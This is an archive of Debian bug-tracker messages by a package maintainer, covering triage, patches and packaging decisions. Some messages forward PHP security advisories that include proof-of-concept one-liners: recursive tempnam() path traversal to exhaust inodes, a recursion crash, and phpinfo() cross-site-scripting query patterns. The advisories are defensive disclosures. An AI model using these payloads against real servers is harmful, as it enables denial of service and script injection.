Bug#777695: ITA: tiff -- TIFF manipulation and conversion documentation
Control: retitle -1 ITA: tiff -- TIFF manipulation and conversion documentation Control: owner -1 ! Hi Jay, as I happen to maintain now default libjpeg library, it seems only logical I will take over this as well. Do you need a help with the two RC bugs that are lingering in BTS right now? Cheers, Ondrej signature.asc Description: Digital signature
Bug#500743: Segmentation fault in running bind9
Hi Simon, Try running memtest on your machine for some time (over a night f.e.) and report back. Ondrej Sury On Oct 1, 2008, at 1:04, Simon Waters <[EMAIL PROTECTED]> wrote: Package: bind9 Version: 1:9.5.0.dfsg.P2-1 Severity: important syslog.log Sep 30 23:23:54 derek kernel: [791273.512364] named[2244]: segfault at dededef2 ip b7eaad0e sp b7549f90 error 7 in libdns.so. 43.0.1[b7e4+141000] I use bind9 running locally on my desktop box as the local recursive resolver. Although this box has some unusual history (ran sid) as far as I can ascertain it is running correct version of bind9 and libraries for lenny. The bind9 config is relatively straight forward, and close to the Debian default, with addition of some local authoritative zones. Twice recently bind9 has stopped, dumping two core files in /var/cache/bind. On both occasions problems were seen resolving some names (reporting timeouts) immediately before the crash. -rw--- 1 bind bind 58179584 2008-09-30 23:23 core.2243 -rw--- 1 bind bind 43302912 2008-09-22 19:58 core.2463 On one occasion I immediately ran "rndc dumpdb" when I encountered issues with name resolution, and the crash took place a few seconds after the database was written to /var/cache/bind/named_dump.db -rw-r--r-- 1 bind bind81933 2008-09-30 23:20 named_dump.db Please advise if this information would be useful in diagnosing bind issues. If any libraries are the wrong version for lenny I will probably reinstall. I couldn't see other reports of this issue, although there are other reports of bind silently stopping, which could be related. Running gdb -c /var/cache/named/core. gave; gdb -c /var/cache/bind/core.2243 GNU gdb 6.8-debian Copyright (C) 2008 Free Software Foundation, Inc. License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html> This is free software: you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law. Type "show copying" and "show warranty" for details. This GDB was configured as "i486-linux-gnu". (no debugging symbols found) Core was generated by `/usr/sbin/named -u bind'. Program terminated with signal 11, Segmentation fault. [New process 2244] [New process 2247] [New process 2246] [New process 2245] [New process 2243] #0 0xb7eaad0e in ?? () gdb -c core.2463 GNU gdb 6.8-debian Copyright (C) 2008 Free Software Foundation, Inc. License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html> This is free software: you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law. Type "show copying" and "show warranty" for details. This GDB was configured as "i486-linux-gnu". (no debugging symbols found) Core was generated by `/usr/sbin/named -u bind'. Program terminated with signal 11, Segmentation fault. [New process 2464] [New process 2467] [New process 2466] [New process 2465] [New process 2463] #0 0xb7e0b6d3 in ?? () daemon.log entries for most recent issue. Sep 30 23:18:53 derek named[2243]: too many timeouts resolving 'www.l.google.com /A' (in 'l.google.com'?): disabling EDNS Sep 30 23:19:08 derek last message repeated 19 times Sep 30 23:19:48 derek named[2243]: too many timeouts resolving 'NS7.NIC.uk/A' (i n 'uk'?): disabling EDNS Sep 30 23:20:07 derek last message repeated 27 times Sep 30 23:20:42 derek named[2243]: received control channel command 'dumpdb' Sep 30 23:20:42 derek named[2243]: dumpdb started Sep 30 23:20:42 derek named[2243]: dumpdb complete Sep 30 23:30:35 derek named[18257]: starting BIND 9.5.0-P2 -u bind -- System Information: Debian Release: lenny/sid APT prefers testing APT policy: (500, 'testing') Architecture: i386 (i686) Kernel: Linux 2.6.26-1-686 (SMP w/2 CPU cores) Locale: LANG=en_GB.UTF-8, LC_CTYPE=en_GB.UTF-8 (charmap=UTF-8) Shell: /bin/sh linked to /bin/bash Versions of packages bind9 depends on: ii adduser 3.110 add and remove users and groups ii bind9utils1:9.5.0.dfsg.P2-1 Utilities for BIND ii debconf [debconf-2.0] 1.5.22 Debian configuration management sy ii libbind9-40 1:9.5.0.dfsg.P2-1 BIND9 Shared Library used by BIND ii libc6 2.7-13 GNU C Library: Shared libraries ii libcap2 2.11-2 support for getting/ setting POSIX. ii libdb4.6 4.6.21-10 Berkeley v4.6 Database Libraries [ ii libdns43 1:9.5.0.dfsg.P2-1 DNS Shared Library used by BIND ii libisc44 1:9.5.0.dfsg.P2-1 ISC Shared Library used by BIND ii libisccc401:9.5.0.dfsg.P2-1 Command Channel Library used by BI ii libisccfg40 1:9.5.0.dfsg.P2-1 Config File Handling Library used ii libkrb53 1.6.dfsg.4~beta1-4 MIT Kerberos ru
Bug#390492: removal of pdftohtml
On Sun, 2006-10-01 at 16:49 +0200, Frederic Peters wrote: > Package: ftp.debian.org > > Hi Moritz, hi Ondrej, hi ftp-masters, > > Ondrej, ftp-master: this is discussion about removing the pdftohtml I > maintain since poppler builds a functional equivalent as part of > poppler-utils package. > > It is triggered by Moritz wrt regular xpdf security issues (pdftohtml > embeds a copy of xpdf code). > > I wrote: > > > > Sorry I forgot to answer you. I had a look to poppler-utils pdftohtml > > > (from experimental) and the only difference is in the unit used for > > > dimensions and coordinates; this is only about XML output. > > > > > > This bugged me since I would have to update my scripts but I believe > > > this is minor with regards to security benefits we gain using a single > > > code base. > > > > > > So I would say you could create a transitional pdftohtml package from > > > poppler-utils and request removal of pdftohtml. Perhaps a NEWS.Debian > > > is approriate for this transitional package, with a note about unit > > > change. > > And Moritz answered: > > > As you're listed as maintainer and I'm busy with Security work, could > > you prepare that before Etch freeze? Otherwise we could make it RC and > > have it fixed as part of one the BSPs. > > Request filed against ftp.debian.org. > > Ondrej: once pdftohtml is removed, would you building a transitional > pdftohtml package with the appropriate NEWS.Debian ? I obviously can > prepare a NMU if you want. I am waiting for poppler-data to propagate through testing. I will upload poppler 0.5.x to unstable then. I think it would be better to prepare dummy transitional package from pdftohtml package, so poppler is not stuck in NEW, we can get rid of pdftohtml source package after etch is out. What do you think? Ondrej. -- Ondřej Surý <[EMAIL PROTECTED]> http://blog.rfc1925.org/ signature.asc Description: This is a digitally signed message part
Bug#386041: [php-maint] Bug#386041: libapache2-mod-php4: segmentation faults in shutdown_memory_manager()
> extension=memcache.so ; build from pecl > extension=fileinfo.so ; build from pecl Ok, now try disabling those two nonstandard modules. (Keep eaccel disabled). My next suspect would be memcache since it does store objects in memory and that segfault is in memory management. Ondrej. On Tue, 2006-09-05 at 02:23 +0400, proforg wrote: > EAccelerator disabled, but apache still crashes. > > some additional information from apache error.log: > > *** glibc detected *** corrupted double-linked list: 0x0172bdc0 *** > [Tue Sep 05 02:07:28 2006] [notice] child pid 19532 exit signal > Aborted (6), possible coredump in /var/tmp/www > > > On 9/5/06, Ondrej Sury <[EMAIL PROTECTED]> wrote: > > tags 386041 +moreinfo > > thank you > > > > > Eaccelerator 0.9.4 loaded as zend_extension > > > > Try disabling Eaccelerator and report if those crashes happen as well. > > Most crashes I have seen were related to Eaccelerator. > > -- Ondřej Surý <[EMAIL PROTECTED]> http://blog.rfc1925.org/ signature.asc Description: This is a digitally signed message part
Bug#386041: [php-maint] Bug#386041: libapache2-mod-php4: segmentation faults in shutdown_memory_manager()
tags 386041 +moreinfo thank you > Eaccelerator 0.9.4 loaded as zend_extension Try disabling Eaccelerator and report if those crashes happen as well. Most crashes I have seen were related to Eaccelerator. Ondrej. -- Ondřej Surý <[EMAIL PROTECTED]> http://blog.rfc1925.org/ signature.asc Description: This is a digitally signed message part
Bug#344203: Dirvish - new upstream - are you ok with NMU?
Much better patch attached. Ondrej. -- Ondrej Sury <[EMAIL PROTECTED]> dirvish_1.2.1-0.1.diff.gz Description: GNU Zip compressed data
Bug#344203: Dirvish - new upstream - are you ok with NMU?
package dirvish tag 344203 +patch thank you Hi Paul, I am using dirvish to backup my workstation and notebook. I don't exactly remember what the problem was, but I know I ended with updating dirvish to 1.2.1. If you are OK with NMU, I will upload new upstream release which closes all other bugs filled on dirvish package. Ondrej. -- Ondrej Sury <[EMAIL PROTECTED]> dirvish_1.2.1-0.1.diff.gz Description: GNU Zip compressed data
Bug#376423: Uninstallable due to versioned dep on mozilla-thunderbird (<< 1.1)
tags 376423 +pending thank you Hi, Hans Öfverbeck is adopting this package and he'll build all languages from one source. Ondrej On Sun, 2006-07-02 at 23:20 +0200, Luk Claes wrote: > Package: mozilla-thunderbird-locale-cs > Severity: serious > Version: 1.07debian-1 > > Hi > > Your package is not installable as the needed mozilla-thunderbird > version << 1.1 is not available anymore. > > Cheers > > Luk > -- Ondrej Sury <[EMAIL PROTECTED]>
Bug#366322:
package desktop-file-utils tags 366322 +patch thank you -- Ondrej Sury <[EMAIL PROTECTED]> diff -Nur desktop-file-utils-0.10/src/eggdesktopentries.c desktop-file-utils-0.10.new/src/eggdesktopentries.c --- desktop-file-utils-0.10/src/eggdesktopentries.c 2004-10-18 18:02:46.0 +0200 +++ desktop-file-utils-0.10.new/src/eggdesktopentries.c 2006-05-11 12:00:11.0 +0200 @@ -1441,7 +1441,7 @@ last_char_index = strlen (value) - 1; - if (value[last_char_index] == ';') + if (last_char_index >= 0 && value[last_char_index] == ';') value[last_char_index] = '\0'; value_vector = g_strsplit (value, ";", 0); @@ -2784,7 +2784,7 @@ p++; } - if (p[-1] == '\\' && error == NULL) + if (p > value && p[-1] == '\\' && error == NULL) { g_set_error (error, EGG_DESKTOP_ENTRIES_ERROR, EGG_DESKTOP_ENTRIES_ERROR_INVALID_VALUE, diff -Nur desktop-file-utils-0.10/src/update-desktop-database.c desktop-file-utils-0.10.new/src/update-desktop-database.c --- desktop-file-utils-0.10/src/update-desktop-database.c 2004-09-08 17:43:14.0 +0200 +++ desktop-file-utils-0.10.new/src/update-desktop-database.c 2006-05-11 11:59:59.0 +0200 @@ -449,6 +449,8 @@ for (i = 0; data_dirs[i] != NULL; i++) args[i] = g_build_filename (data_dirs[i], "applications", NULL); + args[i] = NULL; + g_strfreev (data_dirs); return (const char **) args; signature.asc Description: This is a digitally signed message part
Bug#373991: poppler: FTBFS: invalid conversion
On Fri, 2006-06-16 at 19:07 +0200, Julien Danjou wrote: > Package: poppler > Version: 0.4.5-4 > Severity: serious > > Hello, > > There was a problem while autobuilding your package: > > SplashFTFont.cc:24:10: error: #include expects "FILENAME" or Hi, according to this ^^^ and looking into source codes it looks more like some regression in libxft. I will try to reproduce this error in current sid pbuilder and get back with result... Ondrej. -- Ondrej Sury <[EMAIL PROTECTED]> signature.asc Description: This is a digitally signed message part
Bug#369884: Needs to Pre-Depends: mysql-server
tag 369884 +wontfix severity 369884 normal thank you > Not only do we require mysql-server to be installed, but it needs to be > *configured* before we can run our postinst. That's not true. You need configured mysql-server somewhere, it could be either your localhost or some other dedicated place. I won't depend/pre-depends on mysql-server package to make one use case (all on one box) easier just to cut of all other common use cases (more mail servers, f.e. primary and backup mx, using one mysql server). Ondrej -- Ondrej Sury <[EMAIL PROTECTED]> signature.asc Description: This is a digitally signed message part
Bug#367229: Please provide .pc file...
Package: mailutils Version: 1:0.6.93-3 Please provide included .pc file for use with pkg-config, which is more or less standard way how to provide info about library nowadays... --cut here-- prefix=/usr exec_prefix=${prefix} libdir=${exec_prefix}/lib includedir=${prefix}/include Name: mailutils Description: GNU Mail abstraction library Version: 0.6.93 Libs: -L${libdir} -lmailutils Libs.private: -lgdbm Cflags: -I${includedir} --cut here-- (I am not sure about Libs.private...) O. -- Ondrej Sury <[EMAIL PROTECTED]> signature.asc Description: This is a digitally signed message part
Bug#366030: blobwars: Patch to remove busyloops
> Blobwars uses a busy-loop for timing purposes. This makes it use 100% > CPU all the time, even when it is not doing anything useful. The > attached patch removes the busy-loops and replaces them with > calls to SDL_Delay(). Thanks for the patch. I will send it upstream as well. But before I have one question: why did you added those SDL_Delay(16) on all over places in code... I am sure that upstream will ask as well... Ondrej. -- Ondrej Sury <[EMAIL PROTECTED]> signature.asc Description: This is a digitally signed message part
Bug#362479: pdflatex: symbol lookup error: pdflatex: undefined symbol: _ZN6PDFDocC1EP9GooStringS1_S1_
Hello, I am going to upload new version of poppler 0.5.1 to experimental, which provides libpoppler1 (SONAME change) and bumps shlibs as well. Could you please add versioned dependency to tetex-bin: libpoppler0c2 (<< 0.5.0) (or conflict with libpoppler0c2 (>= 0.5.0). This should solve this bug. Ondrej. -- Ondrej Sury <[EMAIL PROTECTED]> signature.asc Description: This is a digitally signed message part
Bug#362793: ITP: sks -- Cryptographic tool based on ECC
This package name conflicts with the not yet uploaded SKS (Syncronising Key Server) software. Maybe you could pick something else? Umm, and what about: you both pick another bit longer name, so we don't polute our limited package name namespace with tree letter names? F.E. one could be: sks-openpgp and second sks-ecc Please note that if you provide binaries with same name, you either need to rename binaries (I suggest sks-openpgp since it's server software and not commandline) or conflict each other. Ondrej. -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Bug#301864: ITA: php-interbase
retitle 301864 ITA: php4-interbase thank you I will build php-interbase (both php5 and php4) as part of out-of-tree builds of php modules. Ondrej. -- Ondrej Sury <[EMAIL PROTECTED]> signature.asc Description: This is a digitally signed message part
Bug#361855: [php-maint] Bug#361855: tempnam() open_basedir bypass PHP 4.4.2 and 5.1.2
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 [tempnam() open_basedir bypass PHP 4.4.2 and 5.1.2] Author: Maksymilian Arciemowicz (cXIb8O3) Date: - -Written: 26.3.2006 - -Public: 8.4.2006 from SECURITYREASON.COM CVE-2006-1494 - --- 0.Description --- PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web developers to write dynamically generated pages quickly. A nice introduction to PHP by Stig Sæther Bakken can be found at http://www.zend.com/zend/art/intro.php on the Zend website. Also, much of the PHP Conference Material is freely available. tempnam -- Create file with unique file name - --- 1. tempnam() open_basedir bypass --- In function tempname() are required 2 arg`s. http://pl.php.net/manual/en/function.tempnam.php string tempnam ( string dir, string prefix ) So, if we have open_basedir set to /home, we can't create file over /home directory. In ext/standard/file.c (PHP 4.4.2) - -550-578--- PHP_FUNCTION(tempnam) { pval **arg1, **arg2; char *d; char *opened_path; char p[64]; FILE *fp; if (ZEND_NUM_ARGS() != 2 || zend_get_parameters_ex(2, &arg1, &arg2) == FAILURE) { WRONG_PARAM_COUNT; } convert_to_string_ex(arg1); convert_to_string_ex(arg2); if (php_check_open_basedir(Z_STRVAL_PP(arg1) TSRMLS_CC)) { RETURN_FALSE; } d = estrndup(Z_STRVAL_PP(arg1), Z_STRLEN_PP(arg1)); strlcpy(p, Z_STRVAL_PP(arg2), sizeof(p)); if ((fp = php_open_temporary_file(d, p, &opened_path TSRMLS_CC))) { fclose(fp); RETVAL_STRING(opened_path, 0); } else { RETVAL_FALSE; } efree(d); } - -550-578--- if (php_check_open_basedir(Z_STRVAL_PP(arg1) TSRMLS_CC)) { RETURN_FALSE; } Where is arg2? So we can write exploit like: tempnam("path_from_open_basedir", "../../../../../../../../Open_basedir_bypasswd"); tempnam("/home", "../../../../../../tmp/cx"); etc. It is low issue but you can try create a lot of files and overload inodes from HD.I have one particion. /var /dev/ad0s1e 1.0G 97M 858M 10% /var <- Space (B) /dev/ad0s1e 1012974 94472 837466 10% 3796 137514 3% /var <- INODES where mysql and apache try create some file. WWhen we overload free inodes, system have big problem with apache, mysql. Example: cxib# php -r 'function cx(){ tempnam("/www/", "../../../../../../var/tmp/cx"); cx(); } cx();' /var: create/symlink failed, no inodes free /var: create/symlink failed, no inodes free /var: create/symlink failed, no inodes free /var: create/symlink failed, no inodes free ... etc /usr/local/libexec/mysqld: Can't create/write to file '/var/tmp/ibBIsZ6o' (Errcode: 13) And mysql die()! - --- 2. How to fix --- CVS http://cvs.php.net/viewcvs.cgi/php-src/NEWS - --- 3. Greets --- For: sp3x and p_e_a, pi3, eax, Infospec ;] - --- 4. Contact --- Author: SecurityReason.Com [ Maksymilian Arciemowicz ( cXIb8O3 ) ] Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg SecurityReason.Com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.2.2 (FreeBSD) iD8DBQFEOAZB3Ke13X/fTO4RAiDmAKCbBZP8JBC0F/9cB5OgUFJPgqHB4QCgon9L kBEMIExP2TZ0+NP7l5uk9TE= =f3i4 -END PGP SIGNATURE- -- Ondrej Sury <[EMAIL PROTECTED]> signature.asc Description: This is a digitally signed message part
Bug#361854: [php-maint] Bug#361854: function *() php/apache Crash PHP 4.4.2 and 5.1.2
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 [function *() php/apache Crash PHP 4.4.2 and 5.1.2] Author: Maksymilian Arciemowicz (cXIb8O3) Date: - -Written: 21.3.2006 - -Public: 8.4.2006 from SECURITYREASON.COM CVE-2006-1549 - --- 0.Description --- PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web developers to write dynamically generated pages quickly. A nice introduction to PHP by Stig Sæther Bakken can be found at http://www.zend.com/zend/art/intro.php on the Zend website. Also, much of the PHP Conference Material is freely available. - --- 1. function *() Crash --- PHP4/5 is vulnerability to a local denial-of-service. General problem is in allocated data to memory. for example attack: cxib# php -r 'function cx(){ cx(); } cx();' Segmentation fault (core dumped) cxib# Segfault.. let`s see what we have in gdb - --- cxib# cat /www/functionsegfault.php cxib# gdb -q php (gdb) r '/www/functionsegfault.php' Starting program: /usr/local/bin/php '/www/functionsegfault.php' Program received signal SIGSEGV, Segmentation fault. 0x080de6bd in _zval_copy_ctor (zvalue=0xbbc00260, __zend_filename=0x811d8c0 "/usr/ports/lang/php4/work/php-4.4.2/Zend/zend_execute.c", __zend_lineno=1568) at /usr/ports/lang/php4/work/php-4.4.2/Zend/zend_variables.c:111 111 /usr/ports/lang/php4/work/php-4.4.2/Zend/zend_variables.c: No such file or directory. in /usr/ports/lang/php4/work/php-4.4.2/Zend/zend_variables.c (gdb) bt #0 0x080de6bd in _zval_copy_ctor (zvalue=0xbbc00260, __zend_filename=0x811d8c0 "/usr/ports/lang/php4/work/php-4.4.2/Zend/zend_execute.c", __zend_lineno=1568) at /usr/ports/lang/php4/work/php-4.4.2/Zend/zend_variables.c:111 #1 0x080f042a in execute (op_array=0x81b3880) at /usr/ports/lang/php4/work/php-4.4.2/Zend/zend_execute.c:1568 #2 0x080f019a in execute (op_array=0x81b3880) at /usr/ports/lang/php4/work/php-4.4.2/Zend/zend_execute.c:1719 #3 0x080f019a in execute (op_array=0x81b3880) at /usr/ports/lang/php4/work/php-4.4.2/Zend/zend_execute.c:1719 #4 0x080f019a in execute (op_array=0x81b3880) at /usr/ports/lang/php4/work/php-4.4.2/Zend/zend_execute.c:1719 #5 0x080f019a in execute (op_array=0x81b3880) ... - --- or in apache error_log [Mon Mar 20 12:12:54 2006] [notice] child pid 744 exit signal Illegal instruction (4) - --- 2. Greets --- For: sp3x and p_e_a, pi3, eax, Infospec ;] - --- 3. Contact --- Author: SecurityReason.Com [ Maksymilian Arciemowicz ( cXIb8O3 ) ] Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg SecurityReason.Com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.2.2 (FreeBSD) iD8DBQFEOAT43Ke13X/fTO4RAiFnAKC+vzJm1w24b4VN9CMdhE6e6a2L4QCePbp7 lNzhZke21IHXM0TvvjntXyY= =Y7Ft -END PGP SIGNATURE- -- Ondrej Sury <[EMAIL PROTECTED]> signature.asc Description: This is a digitally signed message part
Bug#361853: [php-maint] Bug#361853: phpinfo() Cross Site Scripting PHP 5.1.2 and 4.4.2
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 [phpinfo() Cross Site Scripting PHP 5.1.2 and 4.4.2] Author: Maksymilian Arciemowicz (cXIb8O3) Date: - -Written: 26.2.2006 - -Public: 8.4.2006 from SecurityReason.Com CVE-2006-0996 - --- 0.Description --- PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web developers to write dynamically generated pages quickly. A nice introduction to PHP by Stig Sæther Bakken can be found at http://www.zend.com/zend/art/intro.php on the Zend website. Also, much of the PHP Conference Material is freely available. - --- 1. Cross Site Scripting --- In phpinfo() you can see all Varibles like: file: standard/info.c - -630-636--- php_print_gpcse_array("_REQUEST", sizeof("_REQUEST")-1 TSRMLS_CC); php_print_gpcse_array("_GET", sizeof("_GET")-1 TSRMLS_CC); php_print_gpcse_array("_POST", sizeof("_POST")-1 TSRMLS_CC); php_print_gpcse_array("_FILES", sizeof("_FILES")-1 TSRMLS_CC); php_print_gpcse_array("_COOKIE", sizeof("_COOKIE")-1 TSRMLS_CC); php_print_gpcse_array("_SERVER", sizeof("_SERVER")-1 TSRMLS_CC); php_print_gpcse_array("_ENV", sizeof("_ENV")-1 TSRMLS_CC); - -630-636--- Function php_print_gpcse_array() for any arrays check 4096b of varible. file: standard/info.c - -135-154--- if (Z_TYPE_PP(tmp) == IS_ARRAY) { zval *tmp3; MAKE_STD_ZVAL(tmp3); if (!sapi_module.phpinfo_as_text) { PUTS(""); } php_start_ob_buffer(NULL, 4096, 1 TSRMLS_CC); zend_print_zval_r(*tmp, 0); php_ob_get_buffer(tmp3 TSRMLS_CC); php_end_ob_buffer(0, 0 TSRMLS_CC); elem_esc = php_info_html_esc(Z_STRVAL_P(tmp3) TSRMLS_CC); PUTS(elem_esc); efree(elem_esc); zval_ptr_dtor(&tmp3); if (!sapi_module.phpinfo_as_text) { PUTS(""); } } else if (Z_TYPE_PP(tmp) != IS_STRING) { - -135-154--- So if we create array longer like 4096, html tags don't be remove. Exploit: If in php script is function phpinfo() try create some varibles (array) like phpinfo.php?cx[][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][]=[XSS ] or phpinfo.php?cx[]=c..~4096chars...ccc[XSS] - --- 2. How to fix --- CVS http://cvs.php.net/viewcvs.cgi/php-src/NEWS - --- 3. Greets --- For: sp3x and p_e_a, pi3, eax ;] - --- 4. Contact --- Author: SecurityReason.Com [ Maksymilian Arciemowicz ( cXIb8O3 ) ] Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg SecurityReason.Com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.2.2 (FreeBSD) iD8DBQFEOAIl3Ke13X/fTO4RAo4LAJ0fBxJWN64vWrDYJEuhGkqc/OC42QCbBxip f35+6LHjuBoqP5D2JV84ufs= =iz3m -END PGP SIGNATURE- -- Ondrej Sury <[EMAIL PROTECTED]> signature.asc Description: This is a digitally signed message part
Bug#361856: [php-maint] Bug#361856: copy() Safe Mode Bypass PHP 4.4.2 and 5.1.2
turn 1 and skip security. if (PG(safe_mode) &&(!php_checkuid(Z_STRVAL_PP(source), NULL, CHECKUID_CHECK_FILE_AND_DIR))) { RETURN_FALSE; } return true. Rest functions have checking safe_mode without path and safe mode works. I don't have tested all functions in php ;]. - --- 2. How to fix --- CVS http://cvs.php.net/viewcvs.cgi/php-src/NEWS - --- 3. Exploit --- http://securityreason.com/achievement_exploitalert/8 - --- 4. Greets --- For: sp3x and p_e_a, eax, Infospec - --- 5. Contact --- Author: SecurityReason.Com [ Maksymilian Arciemowicz ( cXIb8O3 ) ] Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg SecurityReason.Com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.2.2 (FreeBSD) iD8DBQFEOAu93Ke13X/fTO4RApXzAKC4OuM/3vn8kyw+EP2R8YVYyH9gkgCcDCMj 2dB55e2x6sPGBJW+w9Kw/OY= =Lfuk -END PGP SIGNATURE- -- Ondrej Sury <[EMAIL PROTECTED]> signature.asc Description: This is a digitally signed message part
Bug#361763: Can get back through door in BioMech Communications before it closes
On Sun, 2006-04-09 at 21:58 -0700, Josh Triplett wrote: > Package: blobwars > Version: 1.05-2 > > In BioMech Communications, as soon as you drop into the water the door > starts closing; however, if you immediately hop back out, the door can > close under you, leaving you trapped on the wrong side of it, and > forcing you to abort the level. Screenshot attached. I am not sure if the game should allow or not shooting yourself in your feet :-). -- Ondrej Sury <[EMAIL PROTECTED]> signature.asc Description: This is a digitally signed message part
Bug#361355: gnome_segv2 segfaults when using Solaris 2.7 X server
On Fri, 2006-04-07 at 22:56 -0400, [EMAIL PROTECTED] wrote: > Other notes: the Solaris display is only 8 bits deep, although a test with > a local (xserver-xorg 6.9.0.dfsg.1-6) "startx -- -depth 8" worked fine. > Reproduced on two separate Solaris boxes. Solaris 9 with a 24-bit display > worked as expected. konqueror works fine on Solaris 2.7. (And, as I said, > galeon used to work.) I don't remember when we started supporting Solaris... What platform do you really run libgnomeui-0 on? If it's not debian, then use your distribution bug channel to fill bug and not debian's. Ondrej. -- Ondrej Sury <[EMAIL PROTECTED]> signature.asc Description: This is a digitally signed message part
Bug#341420: time to include dbase extension as a part of the main php5 packages?
Hi Florent, I have checked those nasty dbf_* files and there is huge problem with them now. They don't include any license at all, so they legal status in more unclear then it was before. Ondrej. -- Ondrej Sury <[EMAIL PROTECTED]> signature.asc Description: This is a digitally signed message part
Bug#348882: Please add PDO
Hi Simon, Adam is working on new config system, which would allow us not to get crazy with more and more extensions. PDO will be added after some time when new config system is in place. Please be patient, thanks. Ondrej. -- Ondrej Sury <[EMAIL PROTECTED]> signature.asc Description: This is a digitally signed message part
Bug#242552: php4: enable aspell extensio
aspell extension is deprecated and replaced by pspell extension, which will be uploaded to archive very soon (and hence your bug closed). Ondrej. -- Ondrej Sury <[EMAIL PROTECTED]> signature.asc Description: This is a digitally signed message part
Bug#355740: Only adding mysql-client as dependency doesn't solve the bug
On Thu, 2006-03-16 at 23:41 +0100, Luk Claes wrote: > Apparantly there needs also be a running server :-) This is feature of dbconfig-common. You need to reconfigure postfix-policyd with: dpkg-reconfigure --priority low postfix-policyd to be able to change host running mysqld, since mysql server doesn't have to be running on same host as postfix-policyd. (Check debconf-get-selections | grep postfix-policyd) # Host name of the MySQL database server for postfix-policyd: postfix-policyd postfix-policyd/remote/host select # Connection method for MySQL database of postfix-policyd: postfix-policyd postfix-policyd/mysql/methodselect unix socket Ondrej. -- Ondrej Sury <[EMAIL PROTECTED]> signature.asc Description: This is a digitally signed message part
Bug#357040: suggestion: default to caseless usernames
> please change the option 'lmtp_downcase_rcpt:' in /etc/imapd.conf to > 'yes' as the default. It is disabled by default so that usernames become > case sensitive. I am for keeping status quo. If you want to setup such _complicated_ mailserver as cyrus is, then you are obliged to read documentation first and then you don't have this problem. > Needless to say, it leaves you without a clue. The only hint is an entry > in the logfile about an LMTP error. If you don't check the logs, you > might never notice that mail is rejected. You should check the logs anyway, so what's the problem? Ondrej. -- Ondrej Sury <[EMAIL PROTECTED]> signature.asc Description: This is a digitally signed message part
Bug#355144: Poppler rendering problems
On Fri, 2006-03-03 at 10:16 -0500, Andrew Clausen wrote: > Package: poppler Could you please send me reportbug output, or at least versions of poppler installed on your system? Ondrej. -- Ondrej Sury <[EMAIL PROTECTED]> signature.asc Description: This is a digitally signed message part
Bug#347789: [Fwd: Re: "Error: Couldn't open 'nameToUnicode' file" while using evince]
package poppler retitle 347789 don't include xpdf configuration when xpdf-common is removed severity 347789 wishlist thank you Ok, I am lowering severity to wishlist, since this bug is semi-valid. It would be nice thing to have, to not include xpdf configuration when xpdf-common is removed, but not purged. Currently I am not able to think of any solution, but this could change in future :-). Ondrej. -- Ondrej Sury <[EMAIL PROTECTED]> --- Begin Message --- Ondrej Sury wrote: while looking into source code it looks like you have xpdfrc somewhere on your system. poppler is parsing (propably for compatibility reasons) xpdfrc configuration file, which could be the place mentioning /usr/share/xpdf/ mapping files. I discovered I had a set of /etc/xpdf/* files that were causing the problem, which were leftovers from an old xpdf-common install. Reinstalling xpdf-common, and then purging it fixed the error. Tom Parker --- End Message --- signature.asc Description: This is a digitally signed message part
Bug#347789: "Error: Couldn't open 'nameToUnicode' file" while using evince
Hi Tom, while looking into source code it looks like you have xpdfrc somewhere on your system. poppler is parsing (propably for compatibility reasons) xpdfrc configuration file, which could be the place mentioning /usr/share/xpdf/ mapping files. Ie. it looks like just as simple configuration bug. Ondrej. -- Ondrej Sury <[EMAIL PROTECTED]> signature.asc Description: This is a digitally signed message part
Bug#352522: libpoppler0c2: Please package newest version
> Please package newest version (0.5.0 as of this writing), it really > helps Evince display and print a lot of PDF. poppler 0.5.0 is unstable upstream branch. If it will be packaged then it will be in experimental. Ondrej. -- Ondrej Sury <[EMAIL PROTECTED]> signature.asc Description: This is a digitally signed message part
Bug#351634: ftbfs: Package requirements (gnome-doc-utils >= 0.3.2) were not met
On Mon, 2006-02-06 at 15:06 +0100, Max Kellermann wrote: > On 2006/02/06 14:50, Ondrej Sury <[EMAIL PROTECTED]> wrote: > > Sure, this is what you get by mixing apples and pears. This situation > > cannot ever happen in testing/unstable and if you trying to backport > > GNOME 2.12 you have to backport whole suite and not just some parts. > > Your control file does not support this claim. If I had to backport > all of the GNOME 2.12 packages, then it would be up to the package > maintainer (i.e. you) to declare proper build dependencies. Build dependency must be created in such way that package builds on distribution which is intended for (unstable - testing). I am not aware of any obligation to provide build dependency for every possible case which could happen (ie. building on stable, ubuntu, whatever). And testing+unstable holds 0.5.2-1 version of gnome-pkg-tools. If you are backporting unstable packages to stable then you must expect some effort on your side (ie. playing with build depends, backporting some additional packages, etc.) Ondrej. -- Ondrej Sury <[EMAIL PROTECTED]> signature.asc Description: This is a digitally signed message part
Bug#351634: ftbfs: Package requirements (gnome-doc-utils >= 0.3.2) were not met
